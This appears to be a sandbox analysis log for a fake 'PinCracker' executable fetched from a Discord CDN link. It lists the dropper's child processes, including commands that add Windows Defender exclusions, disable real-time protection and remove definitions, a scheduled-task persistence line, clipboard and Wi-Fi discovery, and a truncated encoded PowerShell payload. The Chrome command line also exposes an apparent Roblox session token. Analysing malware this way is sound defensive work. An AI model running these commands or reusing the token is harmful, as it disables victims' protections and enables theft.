PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 2944	1892	chrome.exe	88
PID 1892 wrote to memory of 2944	1892	chrome.exe	88
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89
PID 1892 wrote to memory of 1884	1892	chrome.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5640	attrib.exe
4844	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1305576456365146163/1306629137149988928/XneoPinCrackerV1.03.exe?ex=67375cb6&is=67360b36&hm=e213b19c808dbed2a865b7eb2ffc745892e24be362d0bab5c5319ca07615cfd0& _|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_80494648FA815E3F34DE90C838CF07F4E992D60DD39F5ADFFB3590C2E2822FF36758424208C052F528F167A337DEFB238D9E6A3D654E2A68BC7D277CAF7DD1A02FD69CE7D1A741DF654ACAC590A70D64D46005B9C5124C4115BA8681C9936B20C930A12691027B080407C5851E767DF247DB69E4E5A266D671D4B68B0EE28FB9AFF13C4F937A1218C88F437B16EA156D894C1881AF50433E19657FC7F455BFA01E34B532CF18827D3ED0A3EAFCBB7975C3D093A9A4DDD3BDE3F563645FAA5B9093B2C1F4EDD8FA77B2FAB76334F362A937BF6A3D0ADFC14A982B61849E487D283D4507F5A53A4442C5EB6694F69DD091403696B0A7F0181D7430E88098DCF90CCB5793F182D8A85F11F4D1C0B345754C75F3CA7366F094824FA25BBB026C8D012E310804EB0C9F87CE9CEBBFF1B1AE81DB209F378FC57D46F52EC458B4A28699743C00E8836426E55578A1342B20628605753C4AF436A352E338CC483155DCE8DCE9ED53DAC158A3E599B986D2F48254346341C4A5D0D0CFE7AE8F15FEF02F7B2A36A94885579B01990668C0D3B774B53FB6BE2922CDAD9F5F3D1FB9D085C9612004F6948A6D4C349438EEFA3F03A131232F13C799C29F93B745BA6A2A3E2130CBE822E2E7DBEBF6002FFAC23A5444A1B6B6FC8D86DD2E3F2D763EF5C50101EE11C33F2CB31B307C4AEA01C0881ABA1CA165377EBEB705CBD8D5609BED7F2AA59955DDCDBCBDE7EE3FA1067E0419E06FB9694C5357BA1AE08E2CFC359CDD5E8279A3E56FCAE851D67677C0BCE4B64C5E6A9030DFF1B076BADEAA7E3C91518D4111688F3E995837E5BCA643738683C11BACB5728679E1603F229432E61B49DA1AD2E08E82E9803A42BD56A84A4BF94691398DDAA5390CA1BC416E665B63300747D04AC0BDCC423D330260EA4D5F5ED09309F30BAB1D4F402468347090CE9F76FEA7E7366802C2E9ED9E987CFD47F34FE4B227661F4D9481F8AEBC9B056CACF6008D63FA0BB843300644D1E3B08D33242CD29FE9DC6DD67DD72C166083A1F696420F2E14DA4C65A94677E51688214D92D115B39C509E0F0A0E447E462ADB34FAFA2C1A117BC5DD67C3687931AECAE1B74CA2316912
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbb02fcc40,0x7ffbb02fcc4c,0x7ffbb02fcc58
  2⤵
  PID:3660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1880,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1876 /prefetch:2
  2⤵
  PID:4176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1836,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:3
  2⤵
  PID:2944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2252 /prefetch:8
  2⤵
  PID:1884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:1920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4964,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
  2⤵
  PID:2632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4928,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  PID:2668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5104,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5248 /prefetch:8
  2⤵
  PID:1372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5124,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  PID:244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5288,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  PID:228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5144,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4912 /prefetch:8
  2⤵
  PID:1736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4328,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4472 /prefetch:8
  2⤵
  PID:4280
- C:\Users\Admin\Downloads\XneoPinCrackerV1.03.exe
  "C:\Users\Admin\Downloads\XneoPinCrackerV1.03.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3344
- - C:\Users\Admin\AppData\Roaming\XneoPinCrackerV1.02.exe
    "C:\Users\Admin\AppData\Roaming\XneoPinCrackerV1.02.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5064
  - - C:\Users\Admin\AppData\Roaming\ADSDADW.exe
      "C:\Users\Admin\AppData\Roaming\ADSDADW.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4472
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\ADSDADW.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ADSDADW.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5388
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system user'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5880
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system user'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2696
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system user" /tr "C:\Users\Admin\system user"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5328
  - - C:\Users\Admin\AppData\Roaming\AAAAAAAAAA.exe
      "C:\Users\Admin\AppData\Roaming\AAAAAAAAAA.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3484
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AAAAAAAAAA.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4340
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AAAAAAAAAA.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system user'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5800
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system user'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2028
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system user" /tr "C:\Users\Admin\system user"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5352
- - C:\Users\Admin\AppData\Roaming\aaaaaaa.exe
    "C:\Users\Admin\AppData\Roaming\aaaaaaa.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\aaaaaaa.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aaaaaaa.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system user'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system user'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5284
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system user" /tr "C:\Users\Admin\system user"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5368
  - - C:\Users\Admin\AppData\Local\Temp\lcjnjr.exe
      "C:\Users\Admin\AppData\Local\Temp\lcjnjr.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of SetWindowsHookEx
      PID:5304
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\lcjnjr.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5480
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'lcjnjr.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5868
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system user'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5392
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system user'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5212
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system user" /tr "C:\Users\Admin\system user"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3132
    - - C:\Users\Admin\AppData\Local\Temp\ikpjte.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ikpjte.exe"
        5⤵
        Executes dropped EXE
        
        PID:4020
      - C:\Users\Admin\AppData\Local\Temp\ikpjte.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ikpjte.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ikpjte.exe'"
        7⤵
        
        PID:3600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ikpjte.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        7⤵
        
        PID:3688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:2924
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:1032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:5168
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:5224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        7⤵
        
        PID:5452
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        8⤵
        
        PID:3472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        7⤵
        
        PID:2440
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        8⤵
        
        PID:1456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:4372
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:4868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:2904
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:1636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:5668
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:4908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:1736
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:3948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        7⤵
        
        PID:2692
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        8⤵
        
        PID:5588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        7⤵
        Clipboard Data
        
        PID:4324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        8⤵
        Clipboard Data
        
        PID:4424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:432
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:2536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:3864
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:2852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1300
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        7⤵
        
        PID:1140
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:4800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        7⤵
        
        PID:4336
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        8⤵
        
        PID:5140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAE